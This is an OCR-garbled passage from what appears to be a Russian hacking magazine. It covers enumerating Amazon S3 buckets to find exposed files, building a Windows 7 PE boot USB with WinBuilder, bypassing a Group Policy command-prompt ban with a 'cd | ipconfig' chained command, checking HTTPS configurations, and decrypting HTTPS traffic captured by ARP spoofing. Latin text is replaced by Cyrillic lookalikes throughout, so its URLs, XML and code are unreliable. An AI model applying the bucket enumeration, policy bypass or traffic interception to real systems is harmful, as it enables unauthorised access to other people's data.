на ѵѵѵѵѵѵ.ехрІоіІ-сІЬ.сопп/доодІе-богкз ] можно было без труда найти 
оставленные открытыми админки, конфиги, базы данных и тому 
подобные вкусняшки. Тема актуальна и сейчас, но уже не сильно 
интересна. Теперь, когда все идет к тому, что облачные хранилища 
станут основным местом для хостинга файлов, было бы странно, 
если никто не попытался бы засунуть свой нос в чужие контейне- 
ры с данными. Первым, кто об этом рассказал, стал британский 
исследователь ПідіМіща, который пощупал сервис Атагоп 53. 

53 расшифровывается как 5ітр1е Зіогаде 5егѵег, это простое хра- 
нилище файлов от Атагоп. Если совсем кратко, то этот сервис 
позволяет пользователям хранить сколько угодно файлов и выдер- 
живать сколько угодно большую нагрузку. При этом клиент платит 
за используемое дисковое пространство (от $0,055 за Гб), количе- 
ство запросов к ним ($0,01 за 10 000 запросов), исходящий трафик 
(от $0,050 за Гб). Пару слов о том, как устроено хранение файлов. 
Любой файл находится внутри так называемого ЬискеГа (концеп- 
туальное понятие контейнера внутри Атагоп 53), в котором может 
находиться неограниченное количество объектов. Например, 
если объект называется хіооіг/зсаппег.гір и находится в ЬискеГе 
хакер, то к нему можно обратиться, используя ПРЕ Ы:1:р://хакер. 
зЗ.атазопаѵѵз.сопп/хіооІ^/зсаппег.^ір . 

Доступ к ЬискеГу может быть открытым, а может быть ограничен. 
Помимо этого можно дополнительно разрешить или запретить доступ к 
конкретному объекту. Например, если какой-то файл могли скачать все 
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желающие, то у него должны быть права для чтения — «АГ». 

Что сделал ПідіМіща? Он создал в своем аккаунте 53 несколько 
ЬискеГов, открытых и закрытых, с различными правами доступа к 
объектам, после чего изучил ответы сервера при обращении к ним. 
Ответ для закрытого контейнера: 

<Еггог> 

<СосІе>Ассе5 50епіесІ</СосІе> 

<Ме55а§е>Ассе55 0епіесІ</Ме55а§е> 
<Кедие5І;ІсІ>7Р3987394757439В</Кедие5І:ІсІ> 
<Но5І:ІсІ>куМІІікро1лІа-Р]гиРРаігк1іт383]1:2пАпыіуК5Тхѵ7+/ 
СІНдМВсдгХѴ2§г+ЕиАіир</Но5І:ІсІ> 

</Еггог> 

РиЫіс Ьискеі: 

Ответ для открытого ЬискеГа: 

<ІІ5І;Виске1:Ке5и11: хт1п5 = "Ы:1;р : //зЗ . атаіопаыз . сот 
/сІос/2006-03-01/"> 

<Мате>сІі§іриЫіс</Мате> 

<Рге1іх></Рге1іх> 

<Магкегх/Магкег> 

<МахКеу5>1000</МахКеу5> 

<І5Тгипса1;есІ>-РаІ5е</І5Тгипса1:есІ> 

<Соп1;еп1:5> 

<Кеу>ту_1і1е</Кеу> 

кІазГМосІі^есІ >2011-05 -16Т10: 47: 16. 0002</Іа5І;МосІі^есІ> 

<ЕТа§>"51-р-р-РЗс9087648822с0а21212907934а"</ЕТа§> 

<5І2е>6429</5І2е> 

<51;ога§еС1а5 5>5ТАN^АК^</51;ога§еС1а5 5> 

</Соп1:еп1:5> 

</ІІ5І:Виске1:Ке5и11:> 

Для закрытого ЬискеГа сервер возвращает ошибку (Ассезз 
Оепіеб), а для открытого — список файлов. Теперь посмотри на 
ОРГ, с помощью которого производится обращение к ЬискеГу 
(%Ьиске1;_паппе%.з3.аппа2опа\л/з.сопп) — имя подставляется 
прямо в ОРГ. Получается, мы без проблем можем взять ѵѵогЫізІ; 
и проверить существование ЬискеГов с такими именами, заодно 
узнавая их статус. Для открытых контейнеров можно сразу 
получить еще и список файлов, правда, это не значит, что они 
доступны для скачивания (этому могут препятствовать права 
доступа к конкретным объектам). Но обращаясь к каждому из 
объектов, можно изучить ответ сервера: «403 ГогЬібсІеп» (доступ 
запрещен) или «200 ОК» (доступ разрешен). 

Таким образом, легко составляется список файлов, доступных 
для непосредственно загрузки. В результате ВідіМіп)а набро- 
сал на РиЬу простой сценарий Виске! Гіпбег ( ѵѵѵѵѵѵ.сіідіпіща. 
огд/рго]ес1:5/Ьиске1: !іпсІег.рЬр ). реализовав описанную идею. 
Ради эксперимента парень взял ѵѵогсШзІ; с наиболее часто 
используемыми именами пользователей (2226 слов) и с помо- 
щью этого скрипта прошелся по нему. В итоге нашлось 848 
закрытых и 131 открытых Ьискеі'ов. Для загрузки при этом 
было доступно 9683 файлов, среди которых оказались и поль- 
зовательские базы, которые в открытом доступе быть ну никак 
не должны. ^ 
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ѴШ)№ 7 РОКТАВІІ 



Делаем загрузочную флешку с «семеркой» на борту 



Наша задача на сегодня - создать специальную сборку ѴѴіпсІоѵѵз Ъ 
которая бы работала без установки и запускалась прямо с флешки. 
Включив в ее состав необходимый софт, мы сможем решать разные 
задачи: решать проблемы с дисковыми разделами, удалять вирусы 
или, к примеру, использовать хакерские инструменты в привычном 
окружении. 



Давно смекнув, что многие проблемы гораздо проще решать, загру- 
зившись с Ыѵе-носителя, я стараюсь всегда иметь при себе на флешке 
какой-нибудь гесоѵегу-дистрибутив. Согласись, что это если не луч- 
ший, то, по крайней мере, один изудобнейшихспособов восстановить 
систему или, кпримеру, расправиться с малварью (особенно если речь 
идето блокираторе). Я перепробовал многое. Сперва это были системы 
на базе Ыпих, затем СІВС04ѴѴІП, построенный на базе ѴѴіпсІоѵѵзХР, а 
потом я сделал свою собственную сборку, используя небезызвестную 
утилиту ВагСз РЕ Виіісіег [ \л/ѵѵѵѵ.пи2.пи/реЬиі[сІег ). Увы, прога давно не 
обновляется, а, значит, в качестве списокподдерживаемыхсистем, 
доступных для переноса на загрузочный носитель, остается по- 
прежнему тем же: ѴѴіпсІоѵѵз 2000/ХР/2003. Это немного огорчает: уже 
всеуспели привыкнуть к«семерке», и было бы здорово собрать свою 
загрузочную систему именно на базе ѴѴіпсІоѵѵз 7. Сказано — сделано. 

Наш помощник — ѴѴіпВиіІсІег 

В замену РеВиіІсІег нашелся другой, совершенно замечательный 
инструмент — ѴѴіпВиіІсІег. Это даже не программа, а настоящий фрейм- 
ворк для создания ѴѴіпсІоѵѵз РЕ (так называется облегченная версия 
ОС ѴѴіпсІоѵѵз, которая позволяетзагружаться со сменного СО/ВѴВ/ 
С15В-носителя). Для этого он извлекает нужные компоненты из дистри- 
бутива самой системы, а также набора ѴѴіпсІоѵѵз Аиіотаіесі Іпзіаііаііоп 
КІ1; (ѴѴАІК) в качестве основы для системы и позволяетсоздавать 



дополнительные скрипты, с помощью которых в систему встраиваются 
любые сторонние утилиты. 

На базе ѴѴіпВиіІсІегпостроено несколько проектов, вотлишь некоторые 
из НИХ: 

• ЫѵеХР — использует в качестве источника файлов ѴѴіпсІоѵѵзХР и 
создает систему для администраторов. 

• ѴѴіп7РЕ — беретза основу системы дистрибутив ѴѴіпсІоѵѵз 7. 

• ѴізІаРЕ-САРІ — создает сборку на основе Ѵізіа. 

• МаидЫуРЕ — основывается на ѴѴіпсІоѵѵзХР и из коробки поддержи- 
вает воспроизведения медиа-файлов. 

• МиШРЕ — собираетзагрузочную систему из дистрибутива Ѵізіа или 
ѴѴіпсІоѵѵз 7. 

Мыже будем использовать ѴѴіп7РЕ, каксамый проверенный и наи- 
более подходящий для наших задач проект. 

Что нам нужно? 

Длятого, чтобы собрать загрузочную систему на базе ѴѴіпсІоѵѵз 7 нам 
понадобится следующее: 

1 . Дистрибутив ѴѴіпсІоѵѵз 7 х86 или х64, желательно с уже интегрирован- 
ным 5Р1 . 

2 . Последняя версия ѴѴіпВиіІсІег ( ѵѵіпЬиіІсІег.пеІ: ]. Он распространяется 
в виде небольшого ехе-файла, а необходимые для работы компоненты 
и вспомогательныеутилиты дополнительно загружает из Сети. 
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Выбираем компоненты для загрузки 

3 . ѴѴіпсІоѵѵз Аиіотаіесі Іпзіаиаііоп КіНогѴѴіпсІоѵѵз 7 (ѴѴАІК). 
Пакет для автоматической установки ѴѴіпсІоѵѵз весит 
очень немало — это образ на 1 ,7 Гб, который ты можешь 
либо выкачать с сайта Місгозоі'і; ( Ьі1:.[ѵ/роМп7І ). либо взять 
с нашего диска. 

4 . Огіѵеграск’и [ сігіѵеграскз.пеіі/сігіѵеграскз/іаіезі: ] — 
классные наборы драйверов, которые поддерживают 
огромное количество железа. На сайте доступны сборки 
для различных видов девайсов, нам понадобится нетак 
много, а именно — сборники для категорий СЫрзеГ ГАМ, 
ѴѴГАМ МаззЗіогаде бгіѵег. 

Предварительные 

приготовления 

Когда все файлы будут в нашем распоряжении, можно 
приступать к приготовлениям. 

1. Для начала нам нужно установить ѴѴіпсІоѵѵз Аиіотаіесі 
ІнзІаНаГоп КііЬ г ѴѴіпсІоѵѵз 7. Записывать на болванку 
ІБО'шник, само собой, не обязательно: можно просто рас- 
паковать файлы из КВЗАІК_ЕМ.ізо и запустить ЗіагіСО.ехе. 
В появившемся меню автозапуска выбираем ѴѴіпсІоѵѵз АІК 
Зеіир и выполняем самую стандартную установку. Весит 
это хозяйство много, но послетого, какскрипты ѴѴіпВиіІсІег 
извлекут оттуда нужные файлы, ѴѴАІК можно будетудалить 
(имей это в виду). 

2 . Далее копируем файлы ѴѴіпсІоѵѵз 7 с диска или из 150- 
образа в какую-нибудь директорию. 

3 . Размеідаем загруженный ѴѴіпВиіІсІег.ехе в какой-нибудь 
папке (например, С:\ѴѴіпВиі[сІег) — лишь бы не в дирек- 
тории с профайлом пользователя. И запускаем бинарник 
под аккаунтом администратора: иначе программа честно 
предупредиттебя о возможных проблемах. 

4 . ОтѴѴіпВиіІсІег’а в чистом виде толку мало — ему необхо- 
димы сценарии и вспомогательные файлы для создания 
загрузочного дистрибутива. Поэтому первое, что ты 
увидишь после запуска — это «Воѵѵпіоасі Сепіег». Прога 
предложит выбрать проекты, которые необходимо скачать. 
Отмечаем галочками: 

• ирбаІез.ЬооМапсІ.пеІ; (это апдейты); 

• ѵѵіп7ре.ѴѴіпВиіІсІег.пе1;/5Е (файлы проекта ѴѴіп7РЕ). 
Влевом верхнем углу можно выбрать режим загрузки (по 
умолчаниюон выставлен в значение «РесоттепсІесІ»). 
Выбираем через меню «Сотріеіе» и начинаем загрузку 
файлов, нажав на кнопку«Воѵѵп[оасІ». 

5 . По какой-то причине ѴѴіпВиіІсІегне может корректно 
извлечьабсолютно все файлы, необходимые для создания 
сборки, поэтому придется поработать немного руками. 
Необходимо найти файл ЬсбесІіГехе в своей системе 
(ѴѴіпсІоѵѵз 7) и скопировать его в С:\ѴѴіпВиі[сІег\Рго)ес1;з\ 
Тооіз\ѴѴіп7РЕ_5Е\х86 (или С:\ѴѴіпВиі[сІег\Рго)есІз\Тоо[з\ 




Устанавливаем ѴѴАІК 



ѴѴіп7РЕ_5Е\х 64 для 64-битной системы). Туда же нужно 
скопировать следуюідие файлы: 

іта§ех.ехе 

ыіт§арі.сІ11 

ыіттоип1:.іп-Р 

ыіттоип1;.5у5 

ыітзегѵ.ехе 

Изначально они находятся в папке ѴѴАІК. Можно попробо- 
вать не выполнять этот шаг. У меня автоматические скрип- 
ты ѴѴіпВиіІсІегнесмогли сграбить эти файлы, но возможно 
тебе повезет больше. 

Собираем дистрибутив 

Теперь, когда все необходимое для сборки у нас есть и го- 
тово к использованию, нетсмысла затягивать с созданием 
дистрибутива. Опять же раскладываю все по пунктам. 

1 . Итак, в левой панели мы видим дерево проекта ѴѴіп7РЕ 
5Е. Нажимаем но кнопку «Зоигсе»: здесь необходимо 
указать расположение файлов дистрибутива ѴѴіпсІоѵѵз 7. 
Все остальное можно оставить поумолчанию. 

2 . Далее необходимо подключить ксозданию сборки драй- 
веры, которые будет использовать система. Это делается 

в разделе «Вгіѵегз». По умолчанию здесьуказан путь 
%01оЬаІТетр[а1;ез%\Вгіѵегз_х86. Пройде всего нажать на 
кнопку«Ехр1оге» и в появившуюся папку скопировать все 
необходимые драйвера. Просто распаковываем сюда ар- 
хивы Вгіѵеграск’ов, которые мы предварительно скачали. 
Так как поддерживается сканирование поддиректорий, 
то пихать все в одну сумасшедшую кучу необязательно: 
смело размеидай содержимое архивов «как есть». 

3 . Если пройтись по разделу «Тѵѵеакз», то можно допол- 
нительно внести различные косметические настройки 
будуидей системы. К примеру, изменить ѵѵаіірарег, настро- 
ить меню «Пуск», изменить ярлычки. Все очень понятно 
настраивается через соответствуюидие опции. 

4 . Далее переходим в раздел «ѴѴгіІеМесІіа» и активируем 
режим «Сору Іо П5В-Веѵісе», чтобы сразу разместить нашу 
сборку на П5В-флешку, выбрав в меню нужный носитель. 

5 . Теперь можно нажать на кнопку «Ріау» и верить, что 
все пройдетбез сучка и задоринки. Создание сборки, 
очевидно, занимает некоторое время: в процессе можно 
наблюдать, как выполняется один скриптсистемы за 




> СІѴСІ 



Весь необходимый 
набор компонентов 
для создания за- 
грузочной системы 
ты найдешь на нашем 
диске. Само собой, 
кроме дистрибутива 
ѴѴіпсІоѵѵз 7. 




• Полезные плагины: 
Аѵіга АпбѴіг: 
геЬооГрго/1481 7. 

• МаІѵѵагеЬуІез’ Апб- 
Маіѵѵа ге: 
геЬооГрго/9351 . 

• Заіа’з РаззѵѵогсІ 
Репеѵѵ: 

геЬооГрго/2720 . 
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Заливаем на флешку загрузчик 




Проверяем сборку под ѴАЛѵѵаге 

другим (сложно представить, сколько времени ушло бы на выпол- 
нение подобной работы вручную). Соответственно, чем больше 
скриптов ты выбрал для выполнения, тем дольше будет возиться 
ѴѴіпВиіІсІег. В случае ошибки прога сообідит в чем проблема и, скорее 
всего, выдаст в браузере справку с возможным решение проблемы. 
Эту инструкцию я составляю сучетом всех возникшиху меня слож- 
ностей, поэтому ты не должен наступить на мои грабли. Все должно 




Создание образа в ѴѴіпВиіІсІег 




Настройка сети 

быть хорошо, и на выходе ты получишьфайл ѴѴіп7РЕ_х86.І50 в папке 
ѴѴіпВиіШег\І50. 

6 . Прежде чем загружать файлы на флешку, можно предварительно 
проверить работоспособность сборки в виртуальной машине, и здесь 
опять же все автоматизировано. В разделе Ѵігіиа [Тез! можно выбрать 
систему виртуализации (испытание можно устроить, воспользовав- 
шись рЕти,Ѵіг1;иа[Вох,Ѵіг1;иа[РС,ѴМ\л/аге). Я оставил режим поумол- 
чанию (Вез! Етиіабоп), и ѴѴіпВиіІсІегзапускала получившийся образ 
в установленной ѴМѴѴагеѴѴогкзІабоп, что меня вполнеустраивало.Ты 
же можешь выбрать более подходя ідий сценарий. Можно оставить все 
как есть и установить в систему бесплатный и легковесный. 
У.Теперьотом, каквыглядитпереноссистемы на флешку. Снача- 
ла ѴѴіпВиіІсІегзапускаетНР 115В ВізкЗіогаде ЕогтаіТооІ — самую 
правильную утилиту для форматирования ОЗВ-носителей. Выбираем 
здесь ЕАТ32 (если хочешь в будуідем добавить возможность загрузки 
с флешки другой системы) или МТЕ5. Форматируем. После этого в игру 
в ступает утилита 0гиЬ40оз, у которой важное назначение — устано- 
вить на флешкузагрузчик. Тут необходимо: во-первых, правильно 
выбрать диск(таккакбуквы не отображаются, смотри внимательно на 
размер), во-вторых, выбрать в качестве значения параметра «Рагі Еізі; 
— ѴѴЬоІе сіізк (МВР)» и отметить галочкой опцию ВопЧ зеагсЬ Чорру. 
После этого остается нажать на кнопку«Іпз1;аи», моментально по- 
лучить сообідение обустановке загрузчика и, мысленно поблагодарив 
0Ьиг4Воз, закрытьего окно. Все: после этого ѴѴіпВиіІсІегоперативно 
перенесетвсе файлы на ПЗВ-носитель. 

Наша загрузочная флешка с ѴѴіпбоѵѵз 7 готова. 
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Несколько советов 



1 . Какя уже упомянул, в качестве исходного дистрибутива лучше 
взять образ ѴѴіпсІоѵѵз 7 суже включенным пакетом обновления 
(5Р1). С использованием дистрибутива, в котором сервиспака еще 
нет, возникли проблемы с нахождением некоторых библиотек. Хотя, 
оговорюсь, это некритично, потому что ѴѴіпВиіІсІег выдает конкрет- 
ныеспособы решений проблемы. 

2 . В случае каких-то проблем скрипты, как правило, выдают 
ошибки. Если же что-то пошлонетак, новчемименно проблема 
непонятно, помогутлоги. Опция активируется в сценарии «Ріпаііге 

5аѵе [од біе» и включена поумолчанию. Логи ѴѴіпВиі Шег пишет 
очень подробно: можно полностью изучить процесс создания сбор- 
ки, проследить логику выполнения скриптов и в случае какой-то 
проблемы попытаться устранить ошибки. 

3 . Опциональным, но очень полезным проектом является ѵѵѵѵѵѵ. 
рагадІісІегпс.сопп/ѴѴіпВиіІсІег (рекомендую его сразу выбрать для 
загрузки вовремя первого запуска ѴѴіпВиіІсІег]. Он включаете себя 
подробнейшую инструкцию по созданию сценариев. Послеуста- 
новки ищи его в папке Рго]ес[5\РагадІісІег\ѴѴіпВиі[сІег.сЬпп. 

4 . Самый простой способ включить в сборку приложение — это 
найти ее РогІаЫе-версию (например, на сайте рогІаЫеаррз. 
сот], которая уже включает в себя все необходимые файлы для 
работы в «чужой» системе. 




Устраняем ошибки 



( ѵѵѵѵѵѵ.зоЛрегІ'есІ.сот/ргосІисІз/пеІѵѵогкзсаппег ]. и поясню логику с 
помощью комментариев: 

//Секция с информацией о добавляемом приложении 
[таіп] 

Ті1;1е=Nе1;5сап 

0е5Сгір1:іоп=Ме1:5сап Тгот 5оТі;рег-Рес1; 

5е1ес1:есІ=Тгие 

Іеѵе1=5 

Ѵег5Іоп=1 

Мо1лІагпіп§=РаІ5е 

Ооып1оасІ_Іеѵе1=0 

//Важные переменные^ включая путь до исполняемого файла 
[ѵагіаЫез] 

%Рго§гатТі1;1е%=Ме1:5сап 
%Рго§гатЕХЕ%=пе1:5сап . ехе 
%Рго§гатРо1сІег%=пе1;5сап 



Тутуже грех загрузиться с ОЗВ-носителя, чтобы убедиться, что система 
работает не только в виртуальном, но и в настоящем, самом обычном 
окружении. Нохочусразупредупредить: это сильноурезанная вариация 
ѴѴіпсІоѵѵз 7, в которой оставлено минимум компонентов. Н и каких тебе Аего 
и красивых эффектов: все это отключено. А из софта ты по умолчанию 
получаешь некоторые стандартные утилиты ѴѴіпсІоѵѵз (вроде гедесііі’а], 
а также несколько бонусных программ вроде РЕМеІѵѵогкдля настройки 
сети (втом числе беспроводного адаптера] и Орега ЕІЗВдля браузинга. 

Все это неплохо, но явно недостаточно — систему нужно снарядить. 

Скрипты (плагины) 

Дополнительные программы, которые можно включить в состав своей 
сборки системы, распространяются в виде скриптов (или плагинов —так 
ихтоже называют]. Подключить их просто. Достаточно скопировать их в\ 
ѴѴіпВиі[сІег\Рго]ес[з\ѴѴіп7РЕ_5Е\Аррзи потом активировать через ОІЛ- 
интерфейсѴѴіпВиісІег. Правда, чтобы они появились в дереве скриптов, 
программу приходится перезапускать, хотя не исключаю, что обновить 
список плагинов можно как-то проще. В некоторых случаях плагин рас- 
пространяется в виде единственного файла — сценария. Тутесть два 
варианта. Разработчикмогвключить необходимые файлы прямо в этот 
файл, закодировав их в Ьазе64. Или же в составе скрипта никакие файлы 
невключены, и их нужно скопировать в папку со сценарием самому(это 
должно быть подробно описано в Мануэле плагина]. Последнее особенно 
касается коммерческого софта (того же самогоТоІаІСоттапсІег’а], файлы 
которого разработчики плагинов просто не имеют права распространять. 
Теперьотвечаю на наверняка возникший утебя вопрос: «А где взять 
эти плагины?». Есть множество источников — например, отсюда: 

• форум РеЬооІ.рго’з Арр Зсгіріз ( геЬооІ.рго/Ьгит/65 ]: 

• коллекция скриптов А[^о’з ( аІ-]о.99к.огд ]. 

К примеру, можно скачать плагин ѴѴігезЬагк и необходимый для его 
работы ѴѴіпрсар (доступны отсюда: геЬооІ.рго/14842 ]. Перемещаем его 
в каталог Аррз/Меіѵѵогк, активируем через дерево — и у нас получается 
сборка с полноценным сниффером. Ссылки на некоторые полезные 
плагины я привел в боковом выносе. 

Несмотря нато, что готовых плагиновдовольно много, полезноуметь 
самому написать скрипт для добавления нужных программ в систе- 
му. Когда добавляешь новый скрипт через «Тооіз ^ Сгеаіе зсгірі...», 
ѴѴіпВиіІсІег предлагает простой шаблон скрипта. Для примера я приве- 
ду простенький сценарий, который устанавливает Зоі'ірегі'есі Меізсап 



// Команды для установки приложения 
[ргосезз] 

// Копируем нужные файлы из поддиректории пе1і5сап в папке^ где 
находится скрипт (сюда нужно предварительно перенести 
необходимое для работы программы) 
СоруРго§гатД5сгір1;0іг%\%Рго§гатРо1сІег% 

//Добавляем ярлыки 

АсІ с1_5 б о ГІ; с и1: ^ 51: а г1;Ме п и ^ N е1; 5 с а п 

АсІсІ_5бог1:си1: ^ Оезкііор ^ ІМеІіБсап 

//Указываем ^^^•’ки^ которые необходимы для работы программы. 

ІлІіпВиіІсІег включит их в сборку 

Ке^иіге_Рі1е^^ т§т1:арі . сІІІ 

Ке^иіге_Рі1е^^ гпбѵсгі: . сііі 

Кедиіге_Рі1ед,КЕКМЕ132.сІ11 

Ке^иіге_Рі1е^^ Бпшрарі.сІІІ 

Кедиіге_Рі1ед,и5ЕК32.сІ11 

Ке^иіге_Рі1е^^1лI52_32.сI11 

Ке^иіге_Рі1е^^ыБптр32.сI11 

Огромное количество скриптов доступно на форуме геЬооІ.рго, их 
можно посмотреть какпримеры и использовать в качестве основы. 

В любом случае, ничего сложного в создании своих сценариев нет. 
Если есть необходимость просто добавить какие-то файлы в сборку, то 
необязательно для этого создавать плагин. В этой ситуации поможет 
раздел «Сотропепіз ^Асісііііопаі Еііез», который необходим как раз 
длятакой ситуации. Если нажать на кнопку«ВігесІогу Ехатр1е»,тоты 
увидишь структуру папок, используемых в сборке, чтобы понимать, 
куда именно будут добавляться файлы. 

Что у нас получилось? 

Насколько хорошо работаеттакая система? Оченьхорошо! При загрузке 
на моем ноутбуке, сразу цепляются необходимые драйвера, втом числе 
для беспроводного модуля. Таким образом, у меня сразу есть выход в 
Сеть. Все программы, если их правильно интегрировать (то есть, вы- 
полняя все их зависимости], на ура запускаются и работают. А это и софт 
для восстановления системы, работы стаблицами разделов, бэкапа, 
редактирования реестра, а также хак-тулзы. В конце концов, что может 
быть удобнее в качестве вспомогательной системы, которую можно 
всегда брать с собой и в случае необходимости с нее загружаться? 
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ВЗЛОМ 



■ ■ Тюрин «ОгеепОод» Алексей (адгггсіодгадтаіі.сот) 





ЗАДАЧА: РАСШИРИТЬ ПОЗНАНИЯ 
В ОБЛАСТИ ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ. 



РЕШЕНИЕ: 

Знания— сила, с этим трудно поспорить. Знания во многом основы- 
ваются на впитываемой нами информации. Последняя должна быть 
актуальной и достоверной. Где же взять та кую? Сейчас очень многое 
можно почерпнуть с сайтов всевозможных секьюрити компаний и с 
блогов различных спецов. Но их количество очень велико, особенно 
если тебя интересуют какие-то конкретные направления, не говоря уже, 
что ресурсы сильно разнятся по качеству. В общем, примерно на такой 
мысли был организован проектпо обмену бѵкмарами— Ыі:.Іѵ/бРР04і . 

На нем сейчас представлено большое количество закладок на самые 
различныетемы, можно добавлять и свои. Что приятно— мониторят 
данный проектхорошие секьюрити-специалисты из известных компа- 
ний, такчто за качество можно не беспокоиться. 
Крометого,таккакданный выпускрубрики получился во многом 
ѵѵеЬ-ориентированным, предлагаю еще один соответствующий линк. 
^егеппіаб Огоззтап- широко известная вузких кругахличность. И он 
каждый год (на протяжении последних пяти лет) проводит конкурс «Тор 
Теп ѴѴеЬ Наскіпд Тесбпіриез» [ Ьіиѵ/дтІХГ7 ]. Последние призы: проход- 
ка на конфуОѴѴАБР’а ВІаскНаІ; ПЗАи пучок книг. 

Здесь важно отметить, что в список в основном попадают не конкретные 
баги каких-то продуктов, а именно новыетехники и векторы, что более 
интересно. Но для нас главное то, что мы можем почерпнуть оттуда це- 
лый мешоквсего интересного. Многое из описанного в рубрике какраз 
было почерпнуто из этого списка. 



* ИЧ АЦпдш 



■ і ^ 



Мадатігьв*: 






• ИЧ ;і^УіПУПзсНйт€ідге.РегпіГ 



МеШосІоІодіе&: 

» і!Ч /^ж^.оЕг»іи[-аіжиигд <іга^г>ад:і№Ио^ыаіп рмі 
* пч^^ггіваь ивФзрвяес.{)гдГ*^іЪме?1 Зі^^бІ^іВЛТігиІ-СіакзДіЖЯ? 
^ Тап РДІкІ 

» ПЧі^муарсіаЬвпаІпЕегогдГ 



ОЗІМТ 

Рг 9 » 9 ПІаЫопа: 

< ^ 10 .'^^л^ѵ.‘^^^ 1 ^^іе.п^таоаП 11 №пIйпи 1 ае^рега^аоиги^юI^III^а^^а-даИѵапва-да 1 ^^ 5 «ія^пе^Iте^ 

< пса /.'■дгл-.ѵ Т.РІІ 00 ІС п№И)оалі>^пйго<і»чімгіі'іоигрг ■іпкіііоі>іс<^аймгіріа-%Е 2 ЧМ%^э-ріД- 2 -РЬа 7 -:тіг$ ;■ 

дліі^ИіВІлааДа^ 

* РЧ ДѴУНЛУ5РІІ0ЮІС п6г^^^■3'Зд'•^^і.■ЕП|ег11г1^8-^^еп-5(З^ГСЕ■IПІ?II|дВI1«I-аЗ^^МIПП[^ДЗIVЭ-[IИП^^13ГЯ^С^ 

> рч ^унл^аіідираг&лсііізга яііаэдааіяцл гйгтлгіогм 

і і\Ші Нтн/&ап5 оголаадта гортМпН»рздегвЛ« 1 таоМм^ іпеівааіи аІІапД йЛи 

Реоріе апсі Огдііпіхаііолаі: 

* 

1 №-і'і!ту.ідЗидйа 
■ РЧ^№ІоI.гапѵ 

• РЧ./І^іпи№: 5 &этсРЬва 0 йдп/^ИмІІ.а 5 іт 
^ РЧ:/№<иВгпіаЬе 5 .ипп; 

> ід Дбі ЕДЕаяяіМ 

і РЧ^ддаійотдае Яіпѵ 

Закладок много-много: читать — не перечитать 




ЗАДАЧА: ОБХОД ГРУППОВОЙ ПОЛИТИКИ 
НА ЗАПРЕТ КОМАНДНОЙ СТРОКИ. 



РЕШЕНИЕ: 

Вернемся к обсуждению темы обхода групповых политик винды, 
начатой в прошлых номерах. Напомню: групповые политики— это, 
по сути, набор дополнительных ограничений (помимо ограни- 
чений прав доступа к объектам ОС) для обычных пользователей, 
выставляемых админом. 

Сегодня мы коснемся политики— запрет доступа пользователей 
к командной строке. На практике я ее не встречал, но вот способ 
обхода такой забавный, что янемогне написать :). Материал был 
взят с ѵѵѵѵѵѵ.зесигііѵаедіз.сопп . Итак, давай посмотрим, что это за 
политика: 

1) 51:аг1; ^ Кип §ресіі1:.т5с; 

2) ІІзег Соп1і§ига1:іоп АсІтіпІ5І:га1:іѵе Тетр1а1:е5; 

3 )5у5І:ет ^ Ргеѵепі; ассезБ 1:о 1;бе сотшапсі рготрі:. 




Запрещаем пользователям доступ к стсі.ехе и к ЬаЧ 
с|эайлам 

ст б -скрипты. Конечно, ограничение так себе— ѵЬз и аналоги 
запускать все равно можно. Но вернемся к обходу ограничения. 
Действует ононаССдо ѴѴіпбоѵѵз ХР включительно. 

Фича в том, что в данных СС кроме командной строки стб.ехе есть 
еще и сот та п б. сопл. Последняя — это урезанная О С5- кон соль, 
оставленная для обратной совместимости, и она имеет очень 



Суть ее в том, что пользователь не может запускать стб.ехе и ба!-/ 

► 038 
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ограниченный функционал. Теперь самое интересное: запустить 
соттапсі.сопп мы можем, но запускать хоть сколько-нибудь зна- 
чимые команды (ірсопбд, например) возможности нет — отобра- 
жается все то же ограничение на запуск консоли. Зато мы можем 
запустить встроенную команду, типа смены директории «сб». И в 
итоге, следующая комбинация будет работать нормально: 

сб I ірсоп1і§ 

Точно описать причинно-следственную связь такого поведения, 
почему оно работает, я не могу. Но подведу итог: ААА! Это просто 
умора :). 




Обход запрета — очень просто 




ЗАДАЧА: ПРОВЕРИТЬ НТТР5 НА 
ДЫРЯВОСТЬ. 



РЕШЕНИЕ: 

Одна из проблем протокола НТТР — отсутствие шифрования трафика 
и проверки целостности данных, то есть присутствует возможность 
проводить атаки Мап-іп-ібе-тіббіе. Вседанные передаются открытым 
текстом, а это, согласись, совсем не круто. НТТР5 — расширение прото- 
кола НТТР, поддерживающее шифрованиеза счетиспользования 551/ 
Т15-криптопротокола. В 551 используется асимметричный алгоритм с 
открытым ключом. В лучшем случае получается, что данные шифруются, 
а клиентудостоверяется, что сервер — это именнотот сервер. Но какни 
странно, НТТР5 — не панацея. Здесьтоже есть свои дырки, особенно в 
первой версии протокола. Сразу вспоминаются проблемы ссамоподпи- 
санными сертификатами и успешные атаки хакеров на корневые центры 
сертификации. В итоге, в определенных ситуациях можно перехвачен- 
ныйтрафикрасшифровать, но что более актуально — провести пресло- 
вутый МіТМ. Вообще — тема интересная! Но ладно, я о другом. НТТР5 
— вещьспецифическая, и еслитебе необходимо проверитьсервер не 
вникая втонкости,то можно поручить это дело одномуѵѵеЬ-сервису — 
ѵѵѵѵѵѵ.ззиаЬз.сопп/ззІбЬ/апаІуге.ЫппІ . Данный ресурс отлично справля- 
ется со своей задачей: проверяетсертификат, настройки шифрования, 
выводитоценку в соответствии со стандартом, дает ссылки с примерами 
атакна выявленные прорехи. Такчто почекай сервер своего интернет- 
банка и напиши им гневное письмо отом, что они не заботятся о своих 
клиентах! Если что-то нетак, конечно :). 



5иттагу 



ОѵемІІ Наііпд 




2аго 




Пн лп >ч«кні1 Ьі №• І<№Ѵіг ЙіВін 



1Ні н<ѵіг Іі ѵіЛмглШі- Іа 1ІГПІ ліис1.і Імиим Ц ѣирра<Н (мигдЫіШііт ІУма* ІпВа інні'1 . 



□е(аІІ9 




НТТР5 на моем серваке мало чего стоит :) 




ЗАДАЧА: РАСШИФРОВАТЬ НТТР5-ТРАФИК. 



РЕШЕНИЕ: 

И В продолжение предыдущей задачи— примержизненный. 

Против админа была проведена агр-зрообпд-атака и украден 
НТТР5-трафикобщения его с сервером, если точнее— авторизация. 
Конечно, правильнее было бы сразу провести МіТМ и подменить 
сервер своим сервером, особенно сучетом того, что на сервере 
был самоподписанный сертификат (что, в общем -то, обычно для 
локальных сеток), но как-то не срослось :). В итоге был кусок НТТР5- 
трафика, расшифровать который просто так не представляется воз- 
можным. Хотя... при плохом шифровании и использовании облачных 
вычислений :)... Ноэтоуже частности. В общем, использую другую 
уязвимость и житейскую хитрость. Был украден закрытый ключ с 
